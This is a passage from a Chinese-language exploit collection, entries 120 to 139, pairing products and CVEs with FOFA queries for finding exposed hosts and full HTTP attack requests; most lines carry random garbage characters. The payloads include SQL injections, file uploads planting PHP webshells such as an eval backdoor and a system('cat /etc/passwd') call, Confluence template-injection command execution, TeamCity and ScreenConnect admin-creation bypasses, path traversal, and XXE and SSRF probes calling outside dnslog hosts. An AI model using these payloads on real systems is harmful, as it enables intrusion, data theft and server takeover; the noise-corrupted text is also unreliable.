0 r1 \9 Y8 a3 o! I( gsrc=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456
! d2 n5 ?* \' |. y" X8 o. H5 V* N" y
0 p) C Z1 ^: c9 L z7 N
120. 北京百绰智能S40管理平台导入web.php任意文件上传
- [/ q, r# Q! }6 s7 I _CVE-2024-1253
6 _+ k' ~2 w. J3 ~6 b" vFOFA:title="Smart管理平台" Y d0 J' f) y, e4 W* Z* V
POST /useratte/web.php? HTTP/1.1
( c, o4 b% V9 Y9 P6 gHost: ip:port
% N, p$ |% D3 }7 D9 S( h5 QCookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
& ?1 b! [ g! O+ qUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
# f1 c0 ?$ n0 DAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
6 J1 j5 I4 m0 K6 F9 Y! Q) l9 PAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. }; a3 w% W% m6 H' c$ p+ v) [3 b
Accept-Encoding: gzip, deflate
' n# ^0 R" A2 \" M& ]1 xContent-Type: multipart/form-data; boundary=---------------------------423289041236658752706300793286 @: a& L; t# m% U
Content-Length: 597
$ G1 {7 r& p, F1 }Origin: https://ip:port' R- H( m1 T2 s1 e( L
Referer: https://ip:port/sysmanage/licence.php
8 V6 t3 w0 @/ Z4 S7 h: NUpgrade-Insecure-Requests: 1- |! v+ M( C/ I s4 u
Sec-Fetch-Dest: document
! I; }/ X, J: LSec-Fetch-Mode: navigate
( w& J- I1 K' MSec-Fetch-Site: same-origin
; {; d) T4 B9 z% ?: ESec-Fetch-User: ?1
& z$ V( b m# @/ x# F8 k7 bTe: trailers
0 h1 Z1 g8 V* yConnection: close
6 V' f! D7 u1 C- J# P( s5 L
: n$ p* S; v% m7 F1 Q7 F, K N" _-----------------------------42328904123665875270630079328& H4 m( M8 i: W! K t, j8 Q
Content-Disposition: form-data; name="file_upload"; filename="2.php"3 d, A; S: R0 B7 A4 X$ T6 X4 p
Content-Type: application/octet-stream) T4 y% \# s2 s8 e6 l4 h6 e
2 v2 f. r) k/ S% H
<?php phpinfo()?>8 w$ J/ }2 k4 G+ C( d$ M
-----------------------------42328904123665875270630079328, X% c, x. o3 T/ H8 e% L& G
Content-Disposition: form-data; name="id_type"
3 ?4 s$ }4 {: n/ d( C' y6 x5 e9 q$ H. \5 A* p
1
; h2 x% {4 X# {-----------------------------42328904123665875270630079328: ^! ^( x$ g8 U8 b
Content-Disposition: form-data; name="1_ck"! [: t* n, w+ `5 P1 _+ h! A
$ s# U. O3 R5 Y2 g1 b' T: F
1_radhttp! p# T1 V! m, ^7 |7 I/ B# z
-----------------------------42328904123665875270630079328
2 u5 H4 \: w9 v1 x: CContent-Disposition: form-data; name="mode"
5 ?5 y' W- u* i
5 }5 [7 V1 ?6 O8 A Y' r: G6 ]import4 _2 m- L1 W7 t3 E
-----------------------------423289041236658752706300793280 V* K' \* [- ]2 [
6 M: Z# C' n- f# u* r2 n3 F
' u/ }! S! i+ @文件路径/upload/2.php
$ y, e& l! g. ~- ?
" k+ a' k8 R$ S: z4 z121. 北京百绰智能S42管理平台userattestation.php任意文件上传3 D2 n. W2 z$ `8 U& N( g6 d P
CVE-2024-19186 }# U D' W+ S; h3 _- m
FOFA:title="Smart管理平台"
6 l) v# D B* a; \POST /useratte/userattestation.php HTTP/1.1
! d; y1 f$ d& o, m: RHost: 192.168.40.130:8443
4 }" e4 j3 ~8 WCookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac501 S8 B U U9 B$ q
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko8 u& E# o) d% w
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
# ^/ D `8 G" K3 E0 W) wAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" t* N' \0 j) ~
Accept-Encoding: gzip, deflate7 O) D i! U. C; C5 } e
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
% R {) {$ @# ^. q& Z, MContent-Length: 592- F3 T4 f; c( E @: d. c
Origin: https://192.168.40.130:8443
y% X- v) ?) h+ H! ^Upgrade-Insecure-Requests: 13 ]6 B; J# G. b$ T7 Y7 G n; n
Sec-Fetch-Dest: document" t# B2 z# F" z' _5 H
Sec-Fetch-Mode: navigate
, Q/ x+ ^' y5 ?& `3 hSec-Fetch-Site: same-origin
/ b& o( x7 L% l2 p) E% @Sec-Fetch-User: ?1
( k9 Q7 [. ]* U1 j6 [7 l/ s. mTe: trailers; ?, e1 r/ i, n: M0 Y1 Q' j
Connection: close
5 R( C* ^/ {) U) d" T8 o; A* M- f6 D/ A* y! |; H9 ]6 m5 V
-----------------------------423289041236658752706300793282 Y. r) i( v( L, o
Content-Disposition: form-data; name="web_img"; filename="1.php"
' p6 B. z9 ?0 }1 \# sContent-Type: application/octet-stream
. {/ @1 }3 X4 E: H
* _* Z$ ]. c6 w/ S* N' M8 l1 Y# S<?php phpinfo();?>; }! [, y3 Q% u# L8 ~( I, V% L
-----------------------------423289041236658752706300793281 [3 u8 B2 n1 ?1 l. @0 U
Content-Disposition: form-data; name="id_type"! C, P# }( C$ r6 t+ X6 b4 i
- r* _$ X+ ] w' K! J. y: Y: R
17 K; d: A' ~+ W4 g
-----------------------------42328904123665875270630079328' S1 ]( h \; R! n& {
Content-Disposition: form-data; name="1_ck"
. `, q# s3 |- y/ ]
8 H2 Q, k+ t" V9 P c1_radhttp
7 y" u$ C* U# M. w* M. P-----------------------------42328904123665875270630079328, r6 l9 h& s3 y: z' q* h9 x% e
Content-Disposition: form-data; name="hidwel"2 [- P1 h0 E. i& w3 E
# I/ X! C4 r9 U6 ?8 j( O; |, rset0 w) @2 ~- A& {; j6 k& L
-----------------------------42328904123665875270630079328
0 H/ y9 o8 Q) M0 {- ~
# A3 Z6 ? S% ^* ^5 ^; Z- v9 @! T, v w- o
boot/web/upload/weblogo/1.php. Y1 ]- n7 k; j; P
7 U) [" B" ? ~5 z122. 北京百绰智能s200管理平台/importexport.php sql注入
& `0 c5 U1 H- {7 v# B' VCVE-2024-27718FOFA:title="Smart管理平台"
5 ]" }4 W5 |6 K5 U其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version(); b, P2 z$ L! ^! u- N- m* J
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.12 t+ R, M8 s c j0 f6 s
Host: x.x.x.x1 c- Z6 U6 |8 K- y( D: N: }% p `
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc06 w( x" V) r, w& v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0! ?) V/ @4 L0 C7 |) I4 h* U6 O% D
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.88 b- e0 ~+ ?5 H9 R9 o, K; M ~
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
& M2 z$ b0 u" i3 s9 o FAccept-Encoding: gzip, deflate, br M5 ]# G2 v: I! m# U$ P
Upgrade-Insecure-Requests: 1
" k7 ^: d4 k! ~" E5 A8 @Sec-Fetch-Dest: document
, b& H( [* h% C- w; p7 USec-Fetch-Mode: navigate# a' D5 ?) N/ G3 |% k5 U
Sec-Fetch-Site: none
2 G4 G8 \, P, H3 l m* Y2 w" e' jSec-Fetch-User: ?11 _: F( g2 g n$ | q
Te: trailers" a4 H# B, y5 U
Connection: close
2 o. |7 X0 S4 d- r/ R
# P$ h' K, E/ K s3 P0 l
6 j/ z& D _* m1 P9 O% Q% o5 G( J2 m% W0 j& T123. Atlassian Confluence 模板注入代码执行7 j6 e2 k! V9 Z" r' f
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
% E2 N% Z9 h9 w6 a' dPOST /template/aui/text-inline.vm HTTP/1.1/ u; P3 g% v* p0 {
Host: localhost:8090/ A4 C4 P. w% P. v$ p/ c
Accept-Encoding: gzip, deflate, br
9 g; c# S5 P$ c/ H( B' f m; DAccept: */*8 v/ O2 v! z* W* S; P/ R9 Q1 m
Accept-Language: en-US;q=0.9,en;q=0.8
7 u( ~4 [. L2 s. T0 |+ d" u7 DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
U$ B. a X* r: Q+ f# vConnection: close8 r5 [7 ~1 q: f( b6 Y' G% P
Content-Type: application/x-www-form-urlencoded
* t) N3 S3 B q" B( i
* }1 P+ E# Y% M7 n; C' alabel=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
2 C) i8 T1 k8 b6 W7 v
) X' `4 s) A% U# J: ~* _& `) M$ u8 _! d& f
124. 湖南建研工程质量检测系统任意文件上传( E; U8 p- S8 ?' t
FOFA:body="/Content/Theme/Standard/webSite/login.css". G8 |& S+ v/ t" N5 y
POST /Scripts/admintool?type=updatefile HTTP/1.1- `4 ~; v+ z% r+ C" p
Host: 192.168.40.130:8282
; G, [. N2 m! hUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
2 j' x: k% `! z4 n: RContent-Length: 72; H- a& O" t V" S" w Y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
. Y4 c+ ]) }" P) J8 x6 CAccept-Encoding: gzip, deflate, br
" H) q* H$ A2 x1 z/ oAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, i5 H) Z2 d8 z$ LConnection: close' N# p% G8 e- _& V0 R# B
Content-Type: application/x-www-form-urlencoded C! d, b ?' m' o4 L
1 b. o2 B" s" {# z. dfilePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>; g% G0 P# h3 B
5 F$ m, N) |, ~) Z5 h2 }- Q
7 o% d% D3 ^9 o A$ o$ r% Hhttp://192.168.40.130:8282/Scripts/abcgcg.aspx) K: k/ B1 t8 X) }) e7 v
; x* N# w6 I) {) o. x/ R" J5 p$ s
125. ConnectWise ScreenConnect身份验证绕过: V# `8 e/ z) F3 w
CVE-2024-1709
) R E" a+ ]) F( F, w; ^FOFA:icon_hash="-82958153"
! _. n/ C9 [0 P. ^- d, Phttps://github.com/watchtowrlabs ... bypass-add-user-poc0 ^* t/ U; b5 c: S( X/ j
/ p2 {% W9 {9 M! A- {, \/ {, O5 e" c& f4 E$ e, S2 ~
使用方法) w# J9 w7 b& P0 }3 L5 F1 d/ a
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!1 H* @+ }5 p; W
0 T7 K& J6 M2 y
' j# G; u" O9 n, u$ J4 m; b创建好用户后直接登录后台,可以执行系统命令。
" V n! Y& t# N" L8 B4 l
6 ]3 E" y( n' `0 G3 t8 e126. Aiohttp 路径遍历4 d+ g3 V' p0 D& V# y( p5 [- G
FOFA:title=="ComfyUI"
! j! m3 n* T/ ~7 z& F$ N$ CGET /static/../../../../../etc/passwd HTTP/1.1
. T( n# v9 z, x- f( H, i. OHost: x.x.x.x! L/ c1 x% z9 h" S
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36, ]5 t! O2 _% _) v2 {4 d4 d; T
Connection: close5 \- t' S7 \0 Z; z* I) j% s
Accept: */*
; B; A+ J! [! D& `1 XAccept-Language: en
5 ^8 \/ I4 B/ h8 {0 ?; Y1 k' p0 M5 gAccept-Encoding: gzip
7 \* t7 f; Y3 x' O/ ~5 r6 O5 X* x [3 P( J. f9 r" ^
$ f7 l+ D6 V# D( `$ w
127. 广联达Linkworks DataExchange.ashx XXE; p! J/ _& X8 Y$ e( r( i8 l; g
FOFA:body="Services/Identification/login.ashx"
- ^7 z# i" a' x: V: J; W& u4 H! qPOST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
0 t: |( o7 p% ?9 AHost: 192.168.40.130:8888
: n) H) U0 x1 [ RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.362 R" v$ O8 Y7 W. R. O, ?6 y
Content-Length: 4153 {( K7 \0 J2 u$ l. b
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
0 A7 a% x: ^4 }# \Accept-Encoding: gzip, deflate, D- G$ n. t2 r
Accept-Language: zh-CN,zh;q=0.9. M; k, u% I% c! E. w# J: S: |
Connection: close
8 k7 _1 J1 y5 L& H3 {( f/ e5 ]Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
% K" J( m1 i) B' i7 i7 H: j. GPurpose: prefetch
/ j# w5 _. S0 r! {5 ]. p. [$ dSec-Purpose: prefetch;prerender
' { l8 E6 K1 `( [! u" m; m& w$ {+ _. e2 e
------WebKitFormBoundaryJGgV5l5ta05yAIe0
( j' O. [- @1 r" x% f) J6 }" b h: @: oContent-Disposition: form-data;name="SystemName"
7 g# S, N2 j8 w* |9 Q6 r( W# M; c; E
BIM' y/ D0 ]- }; \) W+ z+ {/ U
------WebKitFormBoundaryJGgV5l5ta05yAIe0
1 P5 V! j' x+ s: M/ [8 D! H' LContent-Disposition: form-data;name="Params"& P' J6 t4 `! _# [, |' i; I8 h
Content-Type: text/plain; ~0 u& O( x. v: @$ B& W% S
5 k/ k9 m2 e8 o! [& S$ w
<?xml version="1.0" encoding="UTF-8"?>1 J [+ v* A9 r2 _/ D+ A5 a, ^& F
<!DOCTYPE test [
) {$ `9 P& R8 k7 a<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
/ ^! `, O9 z& P# t1 A8 v( B]
* r5 h' P9 I" @: [>
; Y4 Q1 A6 h8 |8 u8 I" k$ F<test>&t;</test>- Z- Q/ A/ F) U
------WebKitFormBoundaryJGgV5l5ta05yAIe0--
, w) u5 u$ S$ x1 P. n6 h3 l" x4 Q( D, [4 ~
: p/ d0 P5 h8 d. N
" g* e; g* T# g9 Z' g2 W( N! h$ i* ]128. Adobe ColdFusion 反序列化
' l, _! u$ b( y& qCVE-2023-38203
6 y8 ?8 f0 J1 F8 a) I4 R1 IAdobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)
: W4 X7 `, n! x% F4 MFOFA:app="Adobe-ColdFusion"
. ?% Q$ c/ F' h$ Y, xPAYLOAD% j; w8 P8 _) T2 I& |! C2 f
2 Z. @5 n5 j) I& C- H4 B
129. Adobe ColdFusion 任意文件读取5 m( ~/ x/ R& c7 R
CVE-2024-20767- V/ r6 I- m ?4 x) m, B0 \
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
% c' Y# k# }0 O4 X( v第一步,获取uuid
* h: L, q7 p a& B& X* ?GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1' u. o X. O" r- t
Host: x.x.x.x4 P8 Z0 m6 v* Q" ~9 y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
4 O! I/ Y/ j3 d/ e8 K5 X* A4 H `Accept: */*0 t2 H5 {7 z) L# [, Y
Accept-Encoding: gzip, deflate# B* |5 F9 ?9 n
Connection: close
! _2 b/ Y8 `$ j+ q. A6 J2 d( ^# T4 P6 K
0 K/ u0 Y4 p+ ]& H
第二步,读取/etc/passwd文件5 q4 i z4 j1 T
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.18 A7 r4 B9 \ E+ M6 ~' l
Host: x.x.x.x
8 k" W% b6 C, ]. n* y! d# OUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
0 C. [+ c9 s/ z d2 p5 r" ^Accept: */*8 E3 f9 N' r# ?1 a
Accept-Encoding: gzip, deflate
3 j8 B* j: ]& e/ c* t$ g5 ZConnection: close9 J1 H+ |$ L% H4 w' b1 a( c
uuid: 85f60018-a654-4410-a783-f81cbd5000b9
# ^/ ^# b3 Q! `" z$ u' G) |6 t2 s) d7 o' C; W5 t' c% q
, }* @6 s/ Y; p5 } ?" s8 I
130. Laykefu客服系统任意文件上传
' S6 Y7 |9 ~" F d+ Y" y0 QFOFA:icon_hash="-334624619"
8 D1 D) v/ M2 |, N' f6 kPOST /admin/users/upavatar.html HTTP/1.1) V; [8 @' T2 q3 p
Host: 127.0.0.1
! D2 _% a1 B& e7 T- W# H' NAccept: application/json, text/javascript, */*; q=0.01
$ F- [7 d3 R O8 p. D& i9 UX-Requested-With: XMLHttpRequest
) a6 T% @) d9 R, }- _$ oUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.261 Q0 W& k% u* Z9 `) v
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR+ I# R9 f- H- g& o9 ?2 a5 N" J9 D
Accept-Encoding: gzip, deflate! E; G! X- {( k3 E/ x6 @; a! s
Accept-Language: zh-CN,zh;q=0.9
+ e7 a0 F8 L; K" B7 MCookie: user_name=1; user_id=3
" g: d9 a" D1 |4 g* i: A9 f2 v3 @; qConnection: close
) F" b3 i3 s: b6 b$ ]. K3 r" ]0 `, W+ @; @
------WebKitFormBoundary3OCVBiwBVsNuB2kR7 C; O4 q+ r$ S8 w" |" E
Content-Disposition: form-data; name="file"; filename="1.php". N9 O t% V. Q+ L4 @
Content-Type: image/png
f: K. \. ?" V6 N* _ # N2 z' E( _/ ]5 ]3 z
<?php phpinfo();@eval($_POST['sec']);?>
& E. U i& d* b# V# J/ {/ y/ r------WebKitFormBoundary3OCVBiwBVsNuB2kR--5 Q% E; H; u3 ~; A0 d
( u; y* a1 q5 m/ ?+ R8 r
& w1 \" k- ~" L: B131. Mini-Tmall <=20231017 SQL注入
" {4 ]4 _# y( U- EFOFA:icon_hash="-2087517259"
* n2 X8 J6 S) A8 p0 ~ Q后台地址:http://localhost:8080/tmall/admin
$ d( Z" k `# rhttp://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)
8 G# S1 _* B) Z. T. J: Z2 J0 T( x
6 {0 ]8 ^3 {9 E- t132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过) x$ x+ C' i. D
CVE-2024-27198) f) c7 ], N/ l% X4 V3 H
FOFA:body="Log in to TeamCity"* w5 o s5 n! i4 R
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
7 x1 {) ^+ ?0 _$ `6 F! YHost: 192.168.40.130:8111; A$ R$ z# i/ ]" f/ V) N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36- f+ u& ] P/ w" u$ ~
Accept: */*0 q4 x; d* `' A# N
Content-Type: application/json
5 a3 T$ K. o6 K& c0 Y4 |Accept-Encoding: gzip, deflate2 @1 X" w# i T& `% ~
! p; o: C9 h4 y0 ^$ ^2 K$ T# ]{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}% k9 w' L1 X: `; u% P- A
) H# E# \/ f1 ~" H, }# U" b
% q: O6 r S/ N
CVE-2024-27199
7 B" X& b( w7 q5 o+ k/res/../admin/diagnostic.jsp
; H+ \1 Q" {- I. Z' N) N/.well-known/acme-challenge/../../admin/diagnostic.jsp W+ `0 O+ N) D8 d; w9 S" y
/update/../admin/diagnostic.jsp: C( r6 O: A9 B( H( Y
: b3 H2 m$ p4 f! b, h* y% E ?. n/ h$ V' p4 k& R
CVE-2024-27198-RCE.py6 w+ @ d: b, F1 g2 g3 v! X
0 v! r3 C* S# L& g1 j+ B
133. H5 云商城 file.php 文件上传
9 ]2 \0 n7 W" U' oFOFA:body="/public/qbsp.php"
5 V1 Y- ?% x# f$ X+ j3 YPOST /admin/commodtiy/file.php?upload=1 HTTP/1.1
! a2 y5 Y6 f2 sHost: your-ip
& K7 I4 P* q$ D' eUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36% [. ~( O7 J, Z7 [, Y2 g9 N
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx4 X7 Y* v0 Z7 Y/ T/ e! S& M
8 [$ ]) N: @0 V( {------WebKitFormBoundaryFQqYtrIWb8iBxUCx
9 U$ z. S( g: j2 i6 z4 B1 DContent-Disposition: form-data; name="file"; filename="rce.php"
7 W( i0 \. {3 r" A& W7 n" YContent-Type: application/octet-stream v- _2 o* u7 ~" r: [
3 v; I( t- y7 ~9 i7 ]$ ?% g
<?php system("cat /etc/passwd");unlink(__FILE__);?>
& c% Z) @4 A3 _+ w------WebKitFormBoundaryFQqYtrIWb8iBxUCx--: e+ n7 T2 \9 j7 M7 b
( h. r3 g/ o+ ~7 Z
+ V* e3 D$ p4 ]9 f9 {" Y
7 |4 j9 f* {6 j1 H3 C
134. 网康NS-ASG应用安全网关index.php sql注入1 [# `4 f" B. ?" V
CVE-2024-2330
3 j3 m5 q) f% B- ]3 a1 |/ TNetentsec NS-ASG Application Security Gateway 6.3版本/ } A4 r. } A
FOFA:app="网康科技-NS-ASG安全网关"
# w4 [% ]7 s: J" o1 MPOST /protocol/index.php HTTP/1.1& C& x$ J% q2 i
Host: x.x.x.x
4 J/ }: l$ |0 q* H' @& N8 zCookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
+ ~5 W! O3 ]7 ]# ^- k/ T* aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
- R) E1 F8 m- Q4 o& B) _0 z* F6 LAccept: */*
9 |$ V, H( T/ }+ U8 ]Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 Y( r, ^, Z1 L) X; \
Accept-Encoding: gzip, deflate% `8 W+ W$ g R
Sec-Fetch-Dest: empty
. P2 } R. c8 USec-Fetch-Mode: cors5 A" u( \& M. \8 Q9 W# X( g
Sec-Fetch-Site: same-origin5 D. k. Q2 G/ ]6 I9 S* `' L3 T
Te: trailers# C3 L* P5 i$ O* T' n
Connection: close
# r1 g; i5 ]8 U' {1 R/ N9 f- ZContent-Type: application/x-www-form-urlencoded
6 J: S f- i' ?7 j. ZContent-Length: 263" [/ f/ O% w7 a+ M1 p
. G% ]. q1 O* a6 x# @jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}' U; k; D0 h2 y1 H5 v) t& p$ r
: P d: b1 J; p1 C4 h# }6 m9 B% K% w3 A3 y
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入; m4 I1 Y0 T5 x- j; z
CVE-2024-2022
. ^9 u/ @; ^$ ] Y& C# a( GNetentsec NS-ASG Application Security Gateway 6.3版本, _5 h k s2 D5 q
FOFA:app="网康科技-NS-ASG安全网关"
2 H/ n7 E: v) `2 `GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.14 i8 {* i5 M% L* P. W" \& F
Host: x.x.x.x6 e" K# o) u) R& G+ @) x7 y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.361 L: g: f; M6 _2 L
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.75 m3 P; f& b/ x4 h' m$ n
Accept-Encoding: gzip, deflate5 P- d9 \) J |/ J* Z/ v9 b
Accept-Language: zh-CN,zh;q=0.9& \; N D; C3 x) e9 ~; \5 F: ?5 t
Connection: close7 m1 M& ?3 e9 T0 H7 [
t% |$ |! L; O1 d
* x0 [$ }# a$ ]8 A9 T+ I* A- i) o136. NextChat cors SSRF0 w. `/ d) x2 @. R
CVE-2023-497853 n0 ~+ e+ p& [/ G' e! c
FOFA:title="NextChat"$ R ~+ m6 O. a) G
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1+ R) s/ f6 q, e8 V# t5 d. X7 C
Host: x.x.x.x:10000
5 i B3 R3 l* R* M# T3 gUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
( {( r9 x& p' j7 P6 jConnection: close8 |3 \ N* m$ M# m& @, p# a b
Accept: */*
; f' `) v; S% B j$ ~1 PAccept-Language: en8 a. {# c0 p' I- @
Accept-Encoding: gzip
& H3 A4 @ R3 Z, Z5 @2 ?5 z4 \( ~& {# Y
8 A7 z( ]2 _" e+ l6 ?9 ]3 U% O137. 福建科立迅通信指挥调度平台down_file.php sql注入
9 b! s, v& q+ a9 N, n7 }, zCVE-2024-2620+ b( F1 g# i% c2 w) |, Z& [
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"& V3 R: k6 H1 f0 U
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
0 Q" n, u: W: o$ g! r- S* pHost: x.x.x.x
. F1 ?- C+ c. n9 y6 r) n' Y9 A& k2 fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
% F; r; G0 w# I4 S- O6 {0 WAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
/ y* C! N0 G1 bAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! q& [) W- e3 P+ d
Accept-Encoding: gzip, deflate, br
8 A) C" ^! k0 ?* K: q# }1 T! V2 `$ q7 QConnection: close' P: O8 \7 R- r& L
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj" n) W; M; a+ T# j
Upgrade-Insecure-Requests: 1) ]% |( s+ ~! a/ t
$ a6 O. m3 W# m0 L6 G7 \
) v0 r- Y+ f7 J H- h+ U138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
! @4 n h& W# y" v! P* E K( |1 vCVE-2024-2621
# L9 d- ^, C/ s: S- }0 ~* tFOFA:body="app/structure/departments.php" || app="指挥调度管理平台": Q/ K# \, a5 \1 @/ l
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
8 {; Q- a, H9 R3 I$ l% kHost: x.x.x.x6 p A; }$ g, u* K: Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
# K0 m; r: f9 h, y7 C* U$ O& bAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8+ ~9 I* _* U3 _' |5 p% d' X
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
$ O" _* D) \3 OAccept-Encoding: gzip, deflate, br, s" q& ]! @/ ?/ }. u
Connection: close/ R4 \2 Y" [+ {5 u0 o
Upgrade-Insecure-Requests: 1
1 [' t5 V! _$ P& ^7 x
: l) \' Y, n( u$ T
) u5 p1 {6 u* i7 S/ |8 u2 F% W139. 福建科立讯通信指挥调度平台editemedia.php sql注入6 D# ?6 X3 ]9 b2 W
CVE-2024-2622
* G8 a2 C9 W* cFOFA:body="app/structure/departments.php" || app="指挥调度管理平台": Z( V" F9 @$ n" e
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
; b8 J( z$ H/ XHost: x.x.x.x
